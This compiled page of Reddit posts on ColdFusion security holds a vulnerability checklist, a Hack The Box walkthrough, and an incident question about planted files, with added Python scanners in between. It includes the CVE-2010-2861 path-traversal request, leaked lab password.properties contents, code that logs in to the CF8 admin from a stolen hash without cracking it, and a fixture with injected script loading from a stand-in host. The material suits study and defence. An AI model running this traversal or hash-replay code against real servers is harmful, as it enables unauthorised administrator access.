ColdFusion – Penetration Test Resource Page

List of CFML Vulnerabilities & Security Issues

This list is updated frequently as we detect more issues. Also note that we can't detect these issues in all cases on all servers, even if the issue has not been patched yet.
Here are some CFML vulnerabilities & security issues that you might have faced:

  1. Jakarta Virtual Directory Exposed – The /jakarta virtual directory (which is required by CF10+ on Tomcat/IIS) is serving files such as isapi_redirect.properties or isapi_redirect.log. The only URI that should be served is /jakarta/isapi_redirect.dll – you can use Request Filtering to block.
  2. Bitcoin Miner Discovered – Found files in /CFIDE that match the signature of a bitcoin miner exploit. Look for /CFIDE/m /CFIDE/m32 /CFIDE/m64 and /CFIDE/updates.cfm among others.
  3. Hotfix APSB11-14 Not Installed – Apply the hotfixes located in Adobe Security Notice apsb11-14.
  4. Railo Security Issue 2635 – Input of Chr(0) to the ReplaceList function can cause an infinite loop / crash. Fixed in version 4.1.1.008.
  5. XSS Injection in cfform.js – A document.write call was found in your /CFIDE/scripts/cfform.js file; an attacker may be injecting JavaScript. Please check your cfform.js file.
  6. Executable found in CFIDE – Found executable file(s) in /CFIDE with one of the following file extensions: dll, exe, bat, sh
  7. Heartbleed Vulnerability Detected – The heartbleed vulnerability is a bug in OpenSSL (the crypto library used by Apache, NGinx, and others) that can allow the leakage of private keys used for TLS/SSL encryption.
  8. OpenBD AdminAPI Exposed to the Public – The /bluedragon/adminapi/ directory is open to the public; it should be locked down to prevent exploitation.
  9. Security Hotfix APSB12-26 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB12-26 was not found to be installed on your server. This hotfix resolves a sandbox permission issue.
  10. Security Hotfix APSB17-30 Not Installed Or Partially Installed – The security hotfix referenced in Adobe Security Bulletin APSB17-30 was not found to be fully installed on your server. For the hotfix to be effective you must have Java 8 update 121 or greater installed. This hotfix resolves two critical vulnerabilities, CVE-2017-11286 and CVE-2017-11283 / CVE-2017-11284, and one important vulnerability, CVE-2017-11285. The issues are resolved in ColdFusion 11 Update 13+ and ColdFusion 2016 Update 5+ with Java 8 update 121 or greater.
  11. ColdFusion Example Applications Installed – The ColdFusion example applications are installed at /cfdocs/exampleapps/ or /CFIDE/gettingstarted/, they should not be installed on a production server.
  12. Svn Hidden Directory Exposed – A request for /.svn/text-base/index.cfm.svn-base appears to resolve to a subversion repository, which could lead to source code disclosure. Please block .svn/
  13. Solr Search Service Exposed – CVE-2010-0185 detected. ColdFusion 9 Apache Solr services are exposed to the public. Any data in solr search collections may be exposed to the public. Follow the instructions in APSB10-04 to remedy, or upgrade to ColdFusion 9.0.1.
  14. TLS Compression Supported – TLS Compression should be disabled due to the CRIME TLS vulnerability.
  15. Security Hotfix APSB11-04 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB11-04 was not found to be installed on your server. This hotfix also contains most prior security hotfixes.
  16. Git Hidden Directory Exposed – A request for /.git/config appears to resolve to a git repository, which could lead to source code disclosure. Please block .git/
  17. Cross Site Scripting Vulnerability CVE-2011-4368 – CVE-2011-4368 detected. Apply the hotfix located in Adobe Security Notice apsb11-29.
  18. JVM Vulnerable to Java Null Byte Injection – The JVM that you are running is vulnerable to null byte injection (or null byte poisoning) in java.io file operations. Java 1.7.0_40+ or 1.8+ attempt to mitigate null byte injection attacks.
  19. Java 11 Security Update Available – The JVM that you are running contains security vulnerabilities that could be exploited in server side environments. Update to the latest version of Java 11. Note that Oracle Java 11 requires a commercial license. Adobe CF customers can download Oracle Java 11 from the ColdFusion Downloads Page. You can also use OpenJDK, Amazon Corretto, or other non-oracle JVMs for free.
  20. Security Hotfix APSB19-10 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB19-10 was not found to be installed on your server. This hotfix resolves 2 issues, one important (CVE-2019-7092) and one critical (CVE-2019-7091). The issues are resolved in ColdFusion 11 Update 16+ ColdFusion 2016 Update 8+ and ColdFusion 2018 Update 2+. For all security fixes to be effective you should also have Java 8 update 121 or greater installed.
  21. Cross Site Scripting Vulnerability CVE-2011-0583 – CVE-2011-0583 detected. Apply the hotfixes located in Adobe Security Notice apsb11-04. The detection of this vulnerability also indicates to a high degree of likelihood that the following vulnerabilities may also exist: CVE-2011-0580, CVE-2011-0581, CVE-2011-0582, CVE-2011-0584
  22. Apache 2.2 Security Update Available – The version of Apache you are running does not contain the most recent security fixes.
  23. BlazeDS/AMF External XML Entity Injection – CVE-2009-3960 detected. You must apply the hotfix specified in Adobe Security Bulletin APSB10-05, otherwise an attacker can read any file on the server that ColdFusion has permission to read. You need to do this even if you don't use BlazeDS or Flash Remoting because it is enabled in CF by default.
  24. SSL Version 2 Enabled – Your Web Server is accepting SSL V2 connections, a weak protocol. For PCI compliance, and strong security you must disable this protocol on your web server.
  25. Missing Strict-Transport-Security Header – This domain supports HTTPS but does not send the HTTP Strict-Transport-Security response header (HSTS) to force HTTPS.
  26. The /CFIDE/scripts directory is in the default location – Consider changing the default location of /CFIDE/scripts/ by changing the value of the Default Script Src setting in the ColdFusion Administrator.
  27. Recalled Hotfix 10.0.3 Installed – You are running ColdFusion 10.0.3, which has been recalled by Adobe due to bugs in the release. Please install the latest 10.0 hotfix.
  28. ComponentUtils Exposed to the Public – The /CFIDE/componentutils/ directory is open to the public; it should be locked down to prevent exploitation.
  29. ColdFusion Update Available – You may not be running the latest version of ColdFusion 8, consider updating to ColdFusion 8.0.1
  30. Security Hotfix APSB13-10 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB13-10 was not found on your server. This hotfix resolves authentication issues that could allow an attacker to impersonate a user in your application, or a ColdFusion Administrator.
  31. CVE-2010-2861 Detected – Path Traversal Vulnerability detected (CVE-2010-2861, APSB10-18). This allows an attacker to read any file on the server's file system that ColdFusion has access to (within the same drive on Windows).
  32. Security Hotfix APSB13-19 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB13-19 was not found on your server.
  33. Security Hotfix APSB12-15 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB12-15 was not found to be installed on your server. This hotfix resolves a HTTP response splitting vulnerability in the ColdFusion Component Browser CVE-2012-2041.
  34. Security Hotfix APSB16-16 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB16-16 was not found to be installed on your server. This hotfix addresses a XSS issue, a Java Deserialization Vulnerability and a TLS Hostname verification issue. This issue is fixed in ColdFusion 10 Update 19+, ColdFusion 11 Update 8+, and ColdFusion 2016 Update 1+
  35. Vulnerable PageSpeed Module – The Version of PageSpeed Module you are using may be vulnerable to one or more vulnerabilities. Update your PageSpeed web server module to the latest version to resolve.
  36. TLS 1.2 Is Not Enabled – Configure your server to accept TLS 1.2 connections for optimal HTTPS security. Note for IIS you must be running Windows 2008r2 or greater for TLS 1.2 support. You can use our IIS SSL / TLS configuration tool to toggle protocol support on your server.
  37. Java 13 EOL – Java 13 has reached end of life at the release of Java 14. It is not a LTS (Long Term Support Version), you can use Java 11 for LTS.
  38. Lucee Security Issue 2015-08-06 – Lucee fixed an XSS issue in version 4.5.1.023. This issue remains unpatched in Railo.
submitted by aligatorraid to coldfusion
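Several of the items above are plain HTTP checks: does a path that should be blocked answer 200, does the locale traversal hand back password.properties, does the site send HSTS, has cfform.js grown a document.write. The block below is an added example written for this page (it is not the scanner's code, nor anything from the original post) that implements those checks against a fetch(path) callable, so the same functions run against a real host via the standard library or, as here, against a constructed fake responder. The fake responses, the finding names and the helper names are assumptions for illustration.

```python
"""Offline checks for several of the findings listed above.

Added example for this page, not part of the original post or of any
scanner. Each check takes a fetch(path) callable that returns
(status, headers, body), so the same code runs against a real host
(see http_fetch) or, as below, against a constructed fake responder.
The fake responses, the finding names and the helper names are
assumptions for illustration.
"""
import http.client
import re
from typing import Callable, Dict, Tuple

Response = Tuple[int, Dict[str, str], str]
Fetch = Callable[[str], Response]

# CVE-2010-2861 style traversal through the locale parameter; this is the
# request the walkthrough post further down this page used against CF8.
TRAVERSAL = ("/CFIDE/administrator/enter.cfm?locale="
             "../../../../../../../../../../ColdFusion8/lib/password.properties%00en")

# Paths from the list that should not be reachable on a production server.
EXPOSED_PATHS = {
    "jakarta_properties": "/jakarta/isapi_redirect.properties",
    "jakarta_log": "/jakarta/isapi_redirect.log",
    "git_config": "/.git/config",
    "svn_index": "/.svn/text-base/index.cfm.svn-base",
    "componentutils": "/CFIDE/componentutils/",
    "example_apps": "/cfdocs/exampleapps/",
    "openbd_adminapi": "/bluedragon/adminapi/",
}


def check_traversal(fetch: Fetch) -> bool:
    """True when the traversal request hands back password.properties content."""
    status, _, body = fetch(TRAVERSAL)
    return status == 200 and ("rdspassword=" in body or "encrypted=true" in body)


def check_exposed_paths(fetch: Fetch) -> Dict[str, bool]:
    """Finding name -> whether the path answered 200 (a 403 counts as blocked)."""
    return {name: fetch(path)[0] == 200 for name, path in EXPOSED_PATHS.items()}


def check_hsts(fetch: Fetch) -> bool:
    """True when the site root sends a Strict-Transport-Security header."""
    _, headers, _ = fetch("/")
    return any(k.lower() == "strict-transport-security" for k in headers)


def check_cfform_document_write(fetch: Fetch) -> bool:
    """Item 5: a document.write call in cfform.js is a sign of injected script."""
    status, _, body = fetch("/CFIDE/scripts/cfform.js")
    return status == 200 and re.search(r"document\.write\s*\(", body) is not None


def run_all(fetch: Fetch) -> Dict[str, bool]:
    """Collect every check as finding name -> True if the problem is present."""
    findings = check_exposed_paths(fetch)
    findings["path_traversal"] = check_traversal(fetch)
    findings["missing_hsts"] = not check_hsts(fetch)
    findings["cfform_document_write"] = check_cfform_document_write(fetch)
    return findings


def http_fetch(host: str, use_tls: bool = True) -> Fetch:
    """Build a fetch() for a real host with only the standard library (not run offline)."""
    def fetch(path: str) -> Response:
        conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
        conn = conn_cls(host, timeout=10)
        conn.request("GET", path, headers={"Host": host})
        resp = conn.getresponse()
        body = resp.read(65536).decode("utf-8", "replace")
        conn.close()
        return resp.status, dict(resp.getheaders()), body
    return fetch


# Constructed responder standing in for a badly configured CF8 host: the
# traversal works, /jakarta and .git leak, cfform.js has been tampered with,
# and nothing sends HSTS. Everything else 404s.
FAKE_SITE: Dict[str, Response] = {
    "/": (200, {"Content-Type": "text/html"}, "<html>ok</html>"),
    "/jakarta/isapi_redirect.properties": (200, {}, "worker.list=cfusion\n"),
    "/.git/config": (200, {}, "[core]\n\trepositoryformatversion = 0\n"),
    "/CFIDE/scripts/cfform.js": (200, {},
        "function _CF_x(){ document.write('<script src=\"//example.invalid/a.js\"></script>'); }"),
    TRAVERSAL: (200, {}, "#Wed Mar 22 20:53:51 EET 2017\nrdspassword=...\npassword=...\nencrypted=true\n"),
}


def fake_fetch(path: str) -> Response:
    return FAKE_SITE.get(path, (404, {}, "Not Found"))


if __name__ == "__main__":
    for name, present in sorted(run_all(fake_fetch).items()):
        print(f"{'FAIL' if present else 'ok  '} {name}")
```

To run it against a real server, swap fake_fetch for http_fetch("cf.example.invalid") (an assumed hostname); note that the traversal check sends the actual CVE-2010-2861 request, so only use it against systems you are authorised to test, and that a 200 on a directory path is a coarse signal that still needs a look at the body.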

Does anyone else find HTB walkthroughs both validating and also soul crushing?

Like, if not for these hack the box walkthroughs, I would spend many many hours down rabbit holes that probably will lead nowhere.
Sometimes they make me feel so dumb for a lot of reasons, but I feel the dumbest when I miss simple things.
Like I'm doing the Arctic box...
I run an nmap scan and get back 3 open ports. A quick Google for exploits for msrpc gets me to an exploit that requires the hostname of the machine...
I run more nmap scans trying to find the hostname... nada... I guess at a few hostnames with no luck.
Running scans and looking for the hostname for maybe an hour before I decide to pull up the walkthrough.
FIRST, I didn't think to navigate to 10.10.10.11:8500. It never occurred to me to put this into the web browser, even though I've done the same thing with weird ports on other boxes before.
This crushes my soul slightly. I feel like an idiot. Like not checking your corners in csgo or something. Getting bit by something obvious...
So then I stop the walkthrough, I'm like AH-HA, I can take it from here, IPPSEC.
Now I'm browsing directories.
I find a login screen which gives me the name of the service and the version, immediately google an exploit.
Load it up in msfconsole, fire it off at the server (windows/http/coldfusion_fckeditor); it fails, and quickly...
I'm like... I wonder if it's failing because the server takes so long to respond and it's sending commands and the server can't keep up or something.
I find it strange because it seems pretty promising. The file referenced in the info of the Metasploit module exists on the server... it's the correct version. I wonder if I have to tweak the .rb file to maybe somehow put a delay in between commands. After a while of pondering and looking through the module I give up (I know, I know, try harder... damnit!) with that one and start looking for other potential exploits.
I try a few more times and then essentially give up with that one.
Browse back into 10.10.10.11:8500 and now there's a new directory... I think?
I can't remember if userfiles/ was there all along... I don't think it was?
So I open it up and theres:
DUV.jsp        1399  06/07/20 01:08 μμ
H.jsp          1399  06/07/20 01:10 μμ
X.jsp          1399  06/07/20 01:07 μμ
ZBRYASCCN.jsp  1399  06/07/20 01:10 μμ
very very weird looking files.
I try to open them (LOL), the page loads for a while and then doesn't do anything. I view source and there's nothing in the files. I don't know what is up and think that maybe those were there the whole time and I just didn't see the 3rd directory when I started the box.
I might literally be the dumbest man alive because it says the date and time the files were made. Today.
I miss this and I look for other exploits -
I find Adobe ColdFusion - Directory Traversal on exploit db.
Download and fire it off. Not 100% sure what it's doing but it looks like it's going to go read password.properties or something.
I'll be damned if it doesn't return
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
Woah what is this
Encrypted password? I know it says encrypted but, what if I just try it in the admin login page? - nada.
I think it might be "encrypted" with base64 because I've seen that on other boxes so I try to decode it with that (LOL) - nada.
I browse to /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en as per the exploit... see a very weird page that looks like it's been edited. I view source and it also gives me a salt?
So I google "Hash+Salt" and get some info on hashcat
I try to crack it with hashcat for like half an hour with no luck. Hashcat finishes way too fast and doesn't give me anything. I know I am doing something wrong but I start to wonder if any of these boxes have you brute-force things, I think probably not and try to find something else.
I am drawing blanks so I go back to the walkthrough and pretty fast I am validated because IPPSEC also chose the windows/http/coldfusion_fckeditor exploit, and also noticed it was failing fast. I am a goober for being validated like this, but it's nice to know I'm sometimes going in the correct direction... but also soul crushing to keep finding I am *just* missing the solutions... I think probably if I ever had to do a box and I didn't have a walkthrough I'd probably miss something simple, go down deep deep rabbit holes and never finish it.
Back on the walkthrough IPPSEC opens up burp, sets up a proxy and reads the request... he finds that... indeed the exploit has created a file on the server.
Indeed the files in userfiles/ were created by this exploit.
All I had to do was set up a listener and open one of these files like before....
I face desk and write this post to vent.

Please tell me there are other people that have made dumb mistakes like I have that went on to become successful in the field.

submitted by FairlyMetaUsername to hackthebox (also posted to HowToHack)
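The password= value the traversal returned, the base64 attempt, the salt in the enter.cfm source and the hashcat run all fit together once you know how ColdFusion 8 stores and checks the admin password. The block below is an added example written for this page, not part of the original post and not using the box's credentials: in CF8 the stored value is the uppercase SHA-1 hex digest of the password, and the login form's JavaScript submits HMAC-SHA1(key=salt, message=that digest) with the salt from a hidden field on enter.cfm. Those two points come from CF8's public enter.cfm/sha1.js source; check them against the target's own page source, because the hidden-field attribute order in extract_salt() is an assumption. The password, salt, wordlist and HTML fragment are constructed.

```python
"""The CF8 admin hash from password.properties: crack it, or just use it.

Added example for this page; it is not part of the original post and
does not use the box's credentials. In ColdFusion 8 the value stored as
`password=` is the uppercase SHA-1 hex digest of the admin password, and
the login form's JavaScript submits HMAC-SHA1(key=salt, message=that
digest), with the salt taken from a hidden field on enter.cfm. Both
points are taken from the public enter.cfm/sha1.js source of CF8; check
them against the target's own page source. The password, salt, wordlist
and HTML fragment below are constructed.
"""
import hashlib
import hmac
import re
from typing import Iterable, Optional

HEX40 = re.compile(r"^[0-9A-Fa-f]{40}$")


def cf8_password_hash(password: str) -> str:
    """Reproduce the value CF8 writes as password= in password.properties."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def looks_like_sha1(value: str) -> bool:
    """40 hex characters is SHA-1 sized; that is why base64 decoding got nowhere."""
    return HEX40.match(value) is not None


def crack_with_wordlist(stored_hash: str, words: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack, the same job as hashcat -m 100, only slower."""
    target = stored_hash.upper()
    for word in words:
        candidate = word.rstrip("\r\n")
        if cf8_password_hash(candidate) == target:
            return candidate
    return None


def extract_salt(enter_cfm_html: str) -> Optional[str]:
    """Pull the salt hidden field out of enter.cfm (attribute order is an assumption)."""
    m = re.search(r'name="salt"[^>]*value="([^"]+)"', enter_cfm_html)
    return m.group(1) if m else None


def login_form_value(stored_hash: str, salt: str) -> str:
    """What the browser puts in cfadminPassword for this salt.

    The form hashes client-side, so the stored digest alone is enough to
    build a valid value: fetch a fresh salt, compute this, POST it. No
    cracking required.
    """
    key = salt.encode("utf-8")
    msg = stored_hash.upper().encode("utf-8")
    return hmac.new(key, msg, hashlib.sha1).hexdigest()


# Constructed demo data (not the lab box's values).
DEMO_PASSWORD = "Winter2017!"
DEMO_HASH = cf8_password_hash(DEMO_PASSWORD)
DEMO_WORDLIST = ["password\n", "admin\n", "Winter2017!\n", "coldfusion\n"]
DEMO_ENTER_CFM = (
    '<input name="cfadminPassword" type="password">'
    '<input name="salt" type="hidden" value="1490216031000">'
)

if __name__ == "__main__":
    print("stored hash:", DEMO_HASH, "| sha1-shaped:", looks_like_sha1(DEMO_HASH))
    print("cracked   :", crack_with_wordlist(DEMO_HASH, DEMO_WORDLIST))
    salt = extract_salt(DEMO_ENTER_CFM)
    print("salt      :", salt)
    print("cfadminPassword to POST:", login_form_value(DEMO_HASH, salt))
```

Two practical notes. For hashcat the stored value is a plain SHA-1, so the mode is -m 100 and the salt is irrelevant to cracking; it only matters for the login step. And the salt is generated per page load and is assumed here to be accepted only briefly, so fetch enter.cfm, compute login_form_value() and POST the result in one go rather than reusing a salt copied from an earlier view-source.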


How was our server loaded with malicious files java.html, AppletLow.jar and AppletHigh.jar?

The other day our host notified us that our server was hosting malicious files, see subject. The files were hosted in the CFIDE/debug/includes folder. We are running Win 2k3, Apache 2.0, ColdFusion 8, Cygwin with an SSH server, and a few internal Java programs running with Java 1.6 u35. I have combed the logs and haven't seen any sign of access over RDP or SSH. We are not running an FTP server and have all ports but port 80 closed to global traffic. Any ideas?
The files were used in a recent watering hole attack, according to Avast.
Thanks all!
--originally posted in /sysadmin http://www.reddit.com/sysadmin/comments/17821v/how_was_our_server_loaded_with_malicipus_files/
EDIT: Here is the above-mentioned blog entry
EDIT - UPDATE
Thanks all for your suggestions, links, and ideas. I took a look at the ColdFusion-specific CVEs, and found that our site was susceptible to the password.properties admin password hash exploit (example at Google Code here). I patched the necessary files in ColdFusion, and have blocked all external access to the CFIDE directory within Apache.
I am also working to upgrade to Apache 2.2 (I know, Apache 2.0 is old), and possibly to Java 7.
Again, thanks everyone for your help!
submitted by chopsuei3 to AskNetsec
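The host's tip-off in this post was the presence of files that had no business under CFIDE. The block below is an added example written for this page (not part of the original post) that sweeps a CFIDE tree for the file-system indicators the page mentions: executables under /CFIDE (dll, exe, bat, sh, from item 6 of the list), the miner file names from item 2 (m, m32, m64, updates.cfm), the java.html / AppletLow.jar / AppletHigh.jar names from this post, the .jsp and .jar upload extensions seen in the walkthrough post, and anything else modified after a baseline date. The constructed temp tree and the helper names are assumptions; point scan_cfide() at the real CFIDE directory instead.

```python
"""Sweep a CFIDE tree for files that do not belong there.

Added example for this page, not part of the original post. It folds
together the file-system indicators the page mentions: executables under
/CFIDE (dll, exe, bat, sh, from item 6 of the list above), the miner
file names from item 2 (m, m32, m64, updates.cfm), the java.html /
AppletLow.jar / AppletHigh.jar names from this post, and the .jsp and
.jar upload extensions seen in the walkthrough post. Any other file
modified after a baseline you choose is reported too. The constructed
temp tree and the helper names are assumptions; point scan_cfide() at
the real CFIDE directory instead.
"""
import os
import tempfile
import time
from dataclasses import dataclass
from typing import List

EXEC_EXTENSIONS = {".dll", ".exe", ".bat", ".sh", ".jsp", ".jar"}
KNOWN_BAD_NAMES = {"m", "m32", "m64", "updates.cfm",
                   "java.html", "appletlow.jar", "applethigh.jar"}
# Legitimate files that would otherwise trip the extension rule go here,
# listed explicitly rather than guessed (relative, forward-slash paths).
ALLOWLIST = set()


@dataclass
class Finding:
    path: str      # relative to the CFIDE root, forward slashes
    reason: str
    mtime: float


def recent_baseline(days: int) -> float:
    """Epoch seconds for 'days' ago; files newer than this get reported."""
    return time.time() - days * 86400


def scan_cfide(cfide_root: str, modified_after: float) -> List[Finding]:
    """Walk the tree and report indicator names, executable uploads, and fresh changes."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(cfide_root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, cfide_root).replace(os.sep, "/")
            if rel in ALLOWLIST:
                continue
            lower = name.lower()
            ext = os.path.splitext(lower)[1]
            mtime = os.stat(full).st_mtime
            if lower in KNOWN_BAD_NAMES:
                findings.append(Finding(rel, "known indicator name", mtime))
            elif ext in EXEC_EXTENSIONS:
                findings.append(Finding(rel, f"executable/upload extension {ext}", mtime))
            elif mtime > modified_after:
                findings.append(Finding(rel, "modified after baseline", mtime))
    return sorted(findings, key=lambda f: f.path)


def build_constructed_tree() -> str:
    """Create a fake CFIDE: stock files dated a year back, planted files dated now."""
    root = tempfile.mkdtemp(prefix="cfide_")
    a_year_ago = time.time() - 365 * 86400
    planted = [
        ("administrator/enter.cfm", a_year_ago),
        ("scripts/cfform.js", a_year_ago),
        ("scripts/ajax/package.cfm", a_year_ago),
        ("debug/includes/java.html", None),
        ("debug/includes/AppletHigh.jar", None),
        ("m64", None),
        ("adminapi/shell.jsp", a_year_ago),   # old but still an upload extension
    ]
    for rel, when in planted:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("x")
        if when is not None:
            os.utime(path, (when, when))
    return root


if __name__ == "__main__":
    root = build_constructed_tree()
    for f in scan_cfide(root, recent_baseline(30)):
        stamp = time.strftime("%Y-%m-%d", time.localtime(f.mtime))
        print(f"{stamp}  {f.reason:34}  {f.path}")
```

Modification times are only a hint (an attacker who can write files can also reset them, and a patch install legitimately touches many), so treat "modified after baseline" as a triage list and the indicator-name and extension hits as the ones to pull for analysis; in the scenario this post describes, the planted files under debug/includes would surface on both rules.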
